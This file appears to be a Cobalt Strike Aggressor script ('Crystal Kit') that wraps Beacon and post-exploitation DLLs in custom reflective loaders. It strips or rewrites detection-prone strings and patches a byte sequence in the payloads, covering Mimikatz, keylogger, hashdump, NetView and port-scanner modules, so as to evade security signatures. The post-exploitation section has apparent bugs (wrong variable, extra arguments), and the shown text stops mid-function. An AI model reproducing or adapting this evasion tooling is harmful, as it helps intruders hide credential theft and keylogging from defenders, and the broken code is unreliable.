debug ( 7 );

import crystalpalace.spec.* from: crystalpalace.jar;
import java.util.HashMap;

sub print_info {
   println ( formatDate ( "[HH:mm:ss] " ) . "\cE[Crystal Kit]\o " . $1 );
}

# ------------------------------------------------------------------
# A wrapper around strrep to pad the new string before replacing it.
# $1 = input dll
# $2 = original string
# $3 = new string
# return = the modified byte sequence
# ------------------------------------------------------------------
sub strrep_pad
{
    local ( '$input_dll $original_byte_sequence $new_byte_sequence $original_byte_sequence_length $new_byte_sequence_length $difference $padding $new_byte_sequence_padded' );
    
    $input_dll              = $1;
    $original_byte_sequence = $2;
    $new_byte_sequence      = $3;

    $original_byte_sequence_length = strlen ( $original_byte_sequence );
    $new_byte_sequence_length      = strlen ( $new_byte_sequence );

    if ( $new_byte_sequence_length > $original_byte_sequence_length )
    {
        warn ("Input string is too large");
        return $null;
    } 

    $difference = $original_byte_sequence_length - $new_byte_sequence_length;

    if ( $difference != 0 )
    {
        $padding = "\x00" x $difference;
        $new_byte_sequence_padded = $new_byte_sequence . $padding;
    }
    else
    {
        $new_byte_sequence_padded = $new_byte_sequence;
    }
    
    return strrep ( $input_dll, $original_byte_sequence, $new_byte_sequence_padded );
}

set BEACON_RDLL_GENERATE
{
    local ( '$beacon $arch $spec_path $spec $final' );

    $beacon = $2;
    $arch   = $3;

    if ( $arch eq "x86" )
    {
        warn ( "Crystal Kit is x64 only" );
        return $null;
    }

    print_info ( "BEACON_RDLL_GENERATE" );

    $beacon = strrep_pad ( $beacon, "beacon.x64.dll", "" );
    $beacon = strrep_pad ( $beacon, "%02d/%02d/%02d", "%02d/%02d/%04d" );
    $beacon = strrep_pad ( $beacon, "%s as %s\%s: %d", "%s - %s\%s (%d)" );
    $beacon = strrep_pad ( $beacon, "\x48\x89\x5C\x24\x08\x57\x48\x83\xEC\x20\x48\x8B\x59\x10\x48\x8B\xF9\x48\x8B\x49\x08\xFF\x17\x33\xD2\x41\xB8\x00\x80\x00\x00", "\x48\x89\x5C\x24\x08\x57\x48\x83\xEC\x20\x48\x8B\x59\x10\x48\x8B\xF9\x48\x8B\x49\x08\xFF\x17\x33\xD2\x41\xB8\x01\x80\x00\x00" );
    $beacon = strrep_pad ( $beacon, "Argument domain error (DOMAIN)", "");
    $beacon = strrep_pad ( $beacon, "Argument singularity (SIGN)", "");
    $beacon = strrep_pad ( $beacon, "Overflow range error (OVERFLOW)", "");
    $beacon = strrep_pad ( $beacon, "Partial loss of significance (PLOSS)", "");
    $beacon = strrep_pad ( $beacon, "Total loss of significance (TLOSS)", "");
    $beacon = strrep_pad ( $beacon, "The result is too small to be represented (UNDERFLOW)", "");
    $beacon = strrep_pad ( $beacon, "Unknown error", "");
    $beacon = strrep_pad ( $beacon, "_matherr(): %s in %s(%g, %g)", "");
    $beacon = strrep_pad ( $beacon, "(retval=%g)", "");
    $beacon = strrep_pad ( $beacon, "Mingw-w64 runtime failure:", "");
    $beacon = strrep_pad ( $beacon, "Address %p has no image-section", "");
    $beacon = strrep_pad ( $beacon, "VirtualQuery failed for %d bytes at address %p", "");
    $beacon = strrep_pad ( $beacon, "VirtualProtect failed with code 0x%x", "");
    $beacon = strrep_pad ( $beacon, "Unknown pseudo relocation protocol version %d.", "");
    $beacon = strrep_pad ( $beacon, "Unknown pseudo relocation bit size %d.", "");

    $spec_path = getFileProper ( script_resource ( "loader" ), "loader.spec" );
    $spec      = [ LinkSpec Parse: $spec_path ];
    $final     = [ $spec run: $beacon, [ new HashMap ] ];

    if ( strlen ( $final ) == 0 )
    {
        warn ( "Failed to build payload" );
        return $null;
    }

    return $final;
}

set BEACON_RDLL_SIZE {
   return "0";
}

set BEACON_RDLL_GENERATE_LOCAL
{
    local ( '$beacon $arch $gmh $gpa $spec_path $spec $hash_map $final' );

    $beacon = $2;
    $arch   = $3;
    $gmh    = $5;
    $gpa    = $6;

    if ( $arch eq "x86" )
    {
        warn ( "Crystal Kit is x64 only" );
        return $null;
    }

    print_info ( "BEACON_RDLL_GENERATE_LOCAL" );

    $spec_path = getFileProper ( script_resource ( "local-loader" ), "loader.spec" );
    $spec      = [ LinkSpec Parse: $spec_path ];

    $hash_map  = [ new HashMap ];

    [ $hash_map put: "\$GMH", cast ( $gmh, 'b' ) ];
    [ $hash_map put: "\$GPA", cast ( $gpa, 'b' ) ];

    $final = [ $spec run: $beacon, $hash_map ];

    if ( strlen ( $final ) == 0 )
    {
        warn ( "Failed to build payload" );
        return $null;
    }

    return $final;
}

set POSTEX_RDLL_GENERATE
{ 
    local ( '$postex $arch $gmh $gpa $spec_path $spec $hash_map $final' );
   
    $postex = $2;
    $arch   = $3;
    $gmh    = $5;
    $gpa    = $6;

    if ( $arch eq "x86" )
    {
        warn ( "Crystal Kit is x64 only" );
        return $null;
    }

    print_info ( "POSTEX_RDLL_GENERATE" );

    # replace the strings in the port scanner dll 
    $beacon = strrep_pad ( $beacon, "PortScanner", "Scanner module is complete", "");
    $beacon = strrep_pad ( $beacon, "PortScanner", "(ICMP) Target", "pmci trg=");
    $beacon = strrep_pad ( $beacon, "PortScanner", "is alive.", "is up.");
    $beacon = strrep_pad ( $beacon, "PortScanner", "(ARP) Target", "rpa trg=");
    $beacon = strrep_pad ( $beacon, "PortScanner", "[read %d bytes]", "");
    $beacon = strrep_pad ( $beacon, "PortScanner", "[-] Error: Failed to initialise WinSock. Winsock error code", "");
    $beacon = strrep_pad ( $beacon, "PortScanner", ". Exteneded error code", "");
    $beacon = strrep_pad ( $beacon, "PortScanner", "platform:", "pltfm=");
    $beacon = strrep_pad ( $beacon, "PortScanner", "version:", "vrs=");
    $beacon = strrep_pad ( $beacon, "PortScanner", "name:", "name=");
    $beacon = strrep_pad ( $beacon, "PortScanner", "domain:", "dmn=");
    
    $beacon = strrep_pad ( $beacon, "Hashdump", "[-] no results.", "");
    
    $beacon = strrep_pad ( $beacon, "Keylogger", "=======", "");
    $beacon = strrep_pad ( $beacon, "Keylogger", "[backspace]", "<bckspc>");
    $beacon = strrep_pad ( $beacon, "Keylogger", "[tab]", "<tb>");
    $beacon = strrep_pad ( $beacon, "Keylogger", "[clear]", "<clr>");
    $beacon = strrep_pad ( $beacon, "Keylogger", "[shift]", "<alt>");
    $beacon = strrep_pad ( $beacon, "Keylogger", "[control]", "<ctrl>");
    $beacon = strrep_pad ( $beacon, "Keylogger", "[alt]", "<alt>");
    $beacon = strrep_pad ( $beacon, "Keylogger", "[pause]", "<pause>");
    $beacon = strrep_pad ( $beacon, "Keylogger", "[caps lock]", "<cpslck>");
    $beacon = strrep_pad ( $beacon, "Keylogger", "[escape]", "<esc>");
    $beacon = strrep_pad ( $beacon, "Keylogger", "[page up]", "<pgup>");
    $beacon = strrep_pad ( $beacon, "Keylogger", "[page down]", "<pgdwn>");
    $beacon = strrep_pad ( $beacon, "Keylogger", "[end]", "<end>");
    $beacon = strrep_pad ( $beacon, "Keylogger", "[home]", "<home>");
    $beacon = strrep_pad ( $beacon, "Keylogger", "[left]", "<left>");
    $beacon = strrep_pad ( $beacon, "Keylogger", "[up]", "<^>");
    $beacon = strrep_pad ( $beacon, "Keylogger", "[right]", "<right>");
    $beacon = strrep_pad ( $beacon, "Keylogger", "[down]", "<dwn>");
    $beacon = strrep_pad ( $beacon, "Keylogger", "[prtscr]", "<prtsc>");
    $beacon = strrep_pad ( $beacon, "Keylogger", "[insert]", "<insert>");
    $beacon = strrep_pad ( $beacon, "Keylogger", "[delete]", "<dlt>");
    $beacon = strrep_pad ( $beacon, "Keylogger", "[help]", "<help>");
    $beacon = strrep_pad ( $beacon, "Keylogger", "[command]", "<cmd>");
    $beacon = strrep_pad ( $beacon, "Keylogger", "[menu]", "<menu>");
    $beacon = strrep_pad ( $beacon, "Keylogger", "[F1]", "f1");
    $beacon = strrep_pad ( $beacon, "Keylogger", "[F2]", "f2");
    $beacon = strrep_pad ( $beacon, "Keylogger", "[F3]", "f3");
    $beacon = strrep_pad ( $beacon, "Keylogger", "[F4]", "f4");
    $beacon = strrep_pad ( $beacon, "Keylogger", "[F5]", "f5");
    $beacon = strrep_pad ( $beacon, "Keylogger", "[F6]", "f6");
    $beacon = strrep_pad ( $beacon, "Keylogger", "[F7]", "f7");
    $beacon = strrep_pad ( $beacon, "Keylogger", "[F8]", "f8");
    $beacon = strrep_pad ( $beacon, "Keylogger", "[F9]", "f9");
    $beacon = strrep_pad ( $beacon, "Keylogger", "[F10]", "f10");
    $beacon = strrep_pad ( $beacon, "Keylogger", "[F11]", "f11");
    $beacon = strrep_pad ( $beacon, "Keylogger", "[F12]", "f12");
    $beacon = strrep_pad ( $beacon, "Keylogger", "[F13]", "f13");
    $beacon = strrep_pad ( $beacon, "Keylogger", "[F14]", "f14");
    $beacon = strrep_pad ( $beacon, "Keylogger", "[F15]", "f15");
    $beacon = strrep_pad ( $beacon, "Keylogger", "[F16]", "f16");
    $beacon = strrep_pad ( $beacon, "Keylogger", "[F17]", "f17");
    $beacon = strrep_pad ( $beacon, "Keylogger", "[F18]", "f18");
    $beacon = strrep_pad ( $beacon, "Keylogger", "[F19]", "f19");
    $beacon = strrep_pad ( $beacon, "Keylogger", "[F20]", "f20");
    $beacon = strrep_pad ( $beacon, "Keylogger", "[F21]", "f21");
    $beacon = strrep_pad ( $beacon, "Keylogger", "[F22]", "f22");
    $beacon = strrep_pad ( $beacon, "Keylogger", "[F23]", "f23");
    $beacon = strrep_pad ( $beacon, "Keylogger", "[F24]", "f24");
    $beacon = strrep_pad ( $beacon, "Keylogger", "[numlock]", "<numlck>");
    $beacon = strrep_pad ( $beacon, "Keylogger", "[scroll lock]", "<scrllock>");
    $beacon = strrep_pad ( $beacon, "Keylogger", "[ctrl]", "ctrl");
    
    $beacon = strrep_pad ( $beacon, "NetView", "[-] Error:", "");
    $beacon = strrep_pad ( $beacon, "NetView", "IP Address", "ipaddr");
    $beacon = strrep_pad ( $beacon, "NetView", "Server Name", "srv");
    $beacon = strrep_pad ( $beacon, "NetView", "Server Name", "srv");
    $beacon = strrep_pad ( $beacon, "NetView", "-----------", "");
    $beacon = strrep_pad ( $beacon, "NetView", "----------", "");
    $beacon = strrep_pad ( $beacon, "NetView", "---------", "");
    $beacon = strrep_pad ( $beacon, "NetView", "--------", "");
    $beacon = strrep_pad ( $beacon, "NetView", "-------", "");
    $beacon = strrep_pad ( $beacon, "NetView", "----", "");
    $beacon = strrep_pad ( $beacon, "NetView", "Domain Controllers", "DC");
    $beacon = strrep_pad ( $beacon, "NetView", "Domain Computers", "PC");
    $beacon = strrep_pad ( $beacon, "NetView", "Comment", "Desc");
    $beacon = strrep_pad ( $beacon, "NetView", "Name", "name");
    $beacon = strrep_pad ( $beacon, "NetView", "computers", "pc");
    $beacon = strrep_pad ( $beacon, "NetView", "localhost", "local");
    $beacon = strrep_pad ( $beacon, "NetView", "Computers:", "PC:");
    $beacon = strrep_pad ( $beacon, "NetView", "Computers in domain", "PC domain");
    $beacon = strrep_pad ( $beacon, "NetView", "dclist", "dc");
    $beacon = strrep_pad ( $beacon, "NetView", "DCs", "dcs");
    $beacon = strrep_pad ( $beacon, "NetView", "DCs in domain", "dsc domain");
    $beacon = strrep_pad ( $beacon, "NetView", "Domain Controllers:", "dc:");
    $beacon = strrep_pad ( $beacon, "NetView", "Domain Controllers in domain", "dc domain");
    $beacon = strrep_pad ( $beacon, "NetView", "List of domain trusts:", "");
    $beacon = strrep_pad ( $beacon, "NetView", "group", "grp");
    $beacon = strrep_pad ( $beacon, "NetView", "Members of", "mbmrs of");
    $beacon = strrep_pad ( $beacon, "NetView", "Groups:", "grps:");
    $beacon = strrep_pad ( $beacon, "NetView", "Groups for", "grps for");
    $beacon = strrep_pad ( $beacon, "NetView", "localgroup", "lclgrp");
    $beacon = strrep_pad ( $beacon, "NetView", "Local groups for", "lcl grps for");
    $beacon = strrep_pad ( $beacon, "NetView", "logons", "lgns");
    $beacon = strrep_pad ( $beacon, "NetView", "Logged on users at", "lggon usrs at");
    $beacon = strrep_pad ( $beacon, "NetView", "sessions", "sess");
    $beacon = strrep_pad ( $beacon, "NetView", "Sessions for", "sess for");
    $beacon = strrep_pad ( $beacon, "NetView", "share", "shre");
    $beacon = strrep_pad ( $beacon, "NetView", "Shares at", "shres at");
    $beacon = strrep_pad ( $beacon, "NetView", "Users for", "usrs for");
    $beacon = strrep_pad ( $beacon, "NetView", "user", "usr");
    $beacon = strrep_pad ( $beacon, "NetView", "Account information for", "acc info for");
    $beacon = strrep_pad ( $beacon, "NetView", "List of hosts:", "hostlist:");
    $beacon = strrep_pad ( $beacon, "NetView", "List of hosts for domain", "hostlist domain");
    $beacon = strrep_pad ( $beacon, "NetView", "Idle (s)", "sleeping");
    $beacon = strrep_pad ( $beacon, "NetView", "Active (s)", "alive");
    $beacon = strrep_pad ( $beacon, "NetView", "User name", "usrname");
    $beacon = strrep_pad ( $beacon, "NetView", "Computer", "pc");
    $beacon = strrep_pad ( $beacon, "NetView", "Share name", "");
    $beacon = strrep_pad ( $beacon, "NetView", "Current time at", "");
    $beacon = strrep_pad ( $beacon, "NetView", "(Forest tree root)", "");
    $beacon = strrep_pad ( $beacon, "NetView", "(Forest", "");
    $beacon = strrep_pad ( $beacon, "NetView", "(Primary Domain)", "");
    $beacon = strrep_pad ( $beacon, "NetView", "(Direct Outbound)", "");
    $beacon = strrep_pad ( $beacon, "NetView", "(Direct Inbound)", "");
    $beacon = strrep_pad ( $beacon, "NetView", "(Native)", "");
    $beacon = strrep_pad ( $beacon, "NetView", "Full Name", "");
    $beacon = strrep_pad ( $beacon, "NetView", "User's Comment", "");
    $beacon = strrep_pad ( $beacon, "NetView", "Country code", "");
    $beacon = strrep_pad ( $beacon, "NetView", "Account active", "");
    $beacon = strrep_pad ( $beacon, "NetView", "Yes", "");
    $beacon = strrep_pad ( $beacon, "NetView", "Never", "");
    $beacon = strrep_pad ( $beacon, "NetView", "Account expires", "");
    $beacon = strrep_pad ( $beacon, "NetView", "Admin", "");
    $beacon = strrep_pad ( $beacon, "NetView", "Account type", "");
    $beacon = strrep_pad ( $beacon, "NetView", "Guest", "");
    $beacon = strrep_pad ( $beacon, "NetView", "User", "");
    $beacon = strrep_pad ( $beacon, "NetView", "Password last set", "");
    $beacon = strrep_pad ( $beacon, "NetView", "hours ago", "");
    $beacon = strrep_pad ( $beacon, "NetView", "Password expires", "");
    $beacon = strrep_pad ( $beacon, "NetView", "Password changeable", "");
    $beacon = strrep_pad ( $beacon, "NetView", "Password required", "");
    $beacon = strrep_pad ( $beacon, "NetView", "User may change password", "");
    $beacon = strrep_pad ( $beacon, "NetView", "Workstations allowed", "");
    $beacon = strrep_pad ( $beacon, "NetView", "Logon script", "");
    $beacon = strrep_pad ( $beacon, "NetView", "User profile", "");
    $beacon = strrep_pad ( $beacon, "NetView", "Home directory", "");
    $beacon = strrep_pad ( $beacon, "NetView", "Last logon", "");
    $beacon = strrep_pad ( $beacon, "NetView", "(admin)", "");
    $beacon = strrep_pad ( $beacon, "NetView", "unknown", "");
    $beacon = strrep_pad ( $beacon, "NetView", "Type", "");
    $beacon = strrep_pad ( $beacon, "NetView", "Version", "");
    $beacon = strrep_pad ( $beacon, "NetView", "Platform", "");
    $beacon = strrep_pad ( $beacon, "NetView", "PDC", "");
    $beacon = strrep_pad ( $beacon, "NetView", "BDC", "");

    $beacon = strrep_pad ( $beacon, "Mimikatz", "OK !", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "data copy @", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_sekurlsa_enum_kerberos_callback_pth ; kull_m_memory_copy (0x", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "\\_", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Ticket Granting Ticket", "tigranti");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Client Ticket", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Ticket Granting Service", "tigranse");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Cachedir:", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_sekurlsa_sk_tryDecode ; SkpEncryptionWorker(decrypt):", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "-- invalidating the key", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_sekurlsa_sk_candidatekey_add ; No key?", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Encrypted:", "enc:");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "unkData2 :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "* unkData1 :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "AuthData  :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Tag       :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "KdfContext:", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "* LSA Isolated Data:", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "* RootKey  :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_sekurlsa_trymarshal ; CredUnmarshalCredential (0x", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "[?] ?", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "[UsernameForPacked] ?", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "[BinaryBlob]", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "[UsernameTarget]", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_sekurlsa_trymarshal ; Credential->cbSize is", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "[Cert] SHA1:", "1ahs");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "* Marshaled:", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "LUID KO", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "* Password:", "pwd");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "* Domain   :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "* Username :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_sekurlsa_genericCredsOutput ; Unknown version in Kerberos credentials structure", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "<no size, buffer is incorrect>", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "* Key     :", "yek:");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Provider :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Container:", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Reader   :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Card     :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "PIN code :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "* Smartcard", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "(sha1:", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "DPAPI Key:", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "PRT      :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "* Raw data :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "* DPAPI    :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_sekurlsa_genericCredsOutput ; Size error for NtlmHash LsaIso output", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "* SHA1    :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "* LM      :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "* NTLM    :", "mltn:");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "* NTLM     :", "mtln:");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "* LM       :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "* Domain   :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "* Username :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_sekurlsa_pth_luid ; memory handle is not KULL_M_MEMORY_TYPE_PROCESS", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "\\_ kerberos -", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "\\_ msv1_0   -", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "|  LUID", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_sekurlsa_pth_luid ; NtQueryObject:", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_sekurlsa_pth_luid ; OpenProcess", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "is now R/W", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "was already R/W", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "|  LSA Process", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_sekurlsa_pth ; Missing at least one argument : ntlm/rc4 OR aes128 OR aes256", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_sekurlsa_pth ; Bas user or LUID", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_sekurlsa_pth ; CreateProcessWithLogonW", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_sekurlsa_pth ; OpenProcessToken", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_sekurlsa_pth ; GetTokenInformation", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_sekurlsa_pth ; DuplicateTokenEx", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_sekurlsa_pth ; SetThreadToken", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "** Token Impersonation **", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "|  TID  %u", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "|  PID  %u", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", ": replacing NTLM/RC4 key in a session", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_sekurlsa_pth ; ntlm hash/rc4 key length must be 32 (16 bytes)", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_sekurlsa_pth ; AES256 key only supported from Windows 8.1 (or 7/8 with kb2871997)", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_sekurlsa_pth ; AES256 key length must be 64 (32 bytes)", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_sekurlsa_pth ; AES128 key only supported from Windows 8.1 (or 7/8 with kb2871997)", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_sekurlsa_pth ; AES128 key length must be 32 (16 bytes)", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_sekurlsa_pth ; Missing argument : user", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_sekurlsa_pth ; Missing argument : domain", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "impers.", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "luid", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "SID               :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Logon Time        :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Logon Server      :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Domain            :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "User Name         :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Session           :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Authentication Id :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Unknown !", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_sekurlsa_acquireLSA ; Memory opening", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_sekurlsa_acquireLSA ; Local LSA library failed", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_sekurlsa_acquireLSA ; Modules informations", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_sekurlsa_acquireLSA ; Logon list", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_sekurlsa_acquireLSA ; Key import", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "candidate keys found", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", " > SecureKernel stream found in minidump (", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "bytes)", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_sekurlsa_acquireLSA ; Minidump without SystemInfoStream (?)", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_sekurlsa_acquireLSA ; Minidump pInfos->ProcessorArchitecture (", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "!= PROCESSOR_ARCHITECTURE_AMD64 (", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_sekurlsa_acquireLSA ; LSASS process not found (?)", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "file for minidump...", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Opening :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "SekurLSA module", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "List Credentials Manager", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "List Cached MasterKeys", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "List Kerberos Encryption Keys", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "List Kerberos tickets", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Preferred Backup Master keys", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Antisocial", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "DPAPI_SYSTEM secret", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "dpapisystem", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "krbtgt!", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Pass-the-hash", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Set the SecureKernel Boot Key to attempt to decrypt LSA Isolated credentials", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Switch (or reinit) to LSASS minidump context", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Lists CloudAp credentials", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Switch (or reinit) to LSASS process  context", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Lists all available providers credentials", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "List SSP credentials", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Lists LiveSSP credentials", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Lists TsPkg credentials", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Lists Kerberos credentials", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Lists WDigest credentials", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Lists LM & NTLM credentials", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Some commands to enumerate credentials...", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Try to decrypt", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Try to sign", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Try do decrypt a PIN Protector", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Verify Name for:", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "SessionKey:", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "pNC->Name:", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "pNC->Sid :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "pNC->Guid:", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ulExtendedOp:", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "cMaxBytes   :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "cMaxObjects :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_lsadump_dcshadow_encode_sensitive_value ; Unexpected hash len", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "ERROR kuhl_m_lsadump_dcshadow_encode_sensitive_value ; RtlEncryptNtOwfPwdWithIndex", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "(not an object GUID)", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Link to key with GUID:", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "** TRUSTED DOMAIN - Antisocial **", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "BCKUPKEY_PREFERRED Secret", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "BCKUPKEY_P Secret", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "BCKUPKEY_", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Unknown data :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Last change:", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Password   :", "pwd:");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Partner              :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "LAPS:", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Credentials:", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Object Relative ID   :", "");
    $beacon = strrep_pad ( $beacon, "Mimikatz", "Object Security ID   :", "");
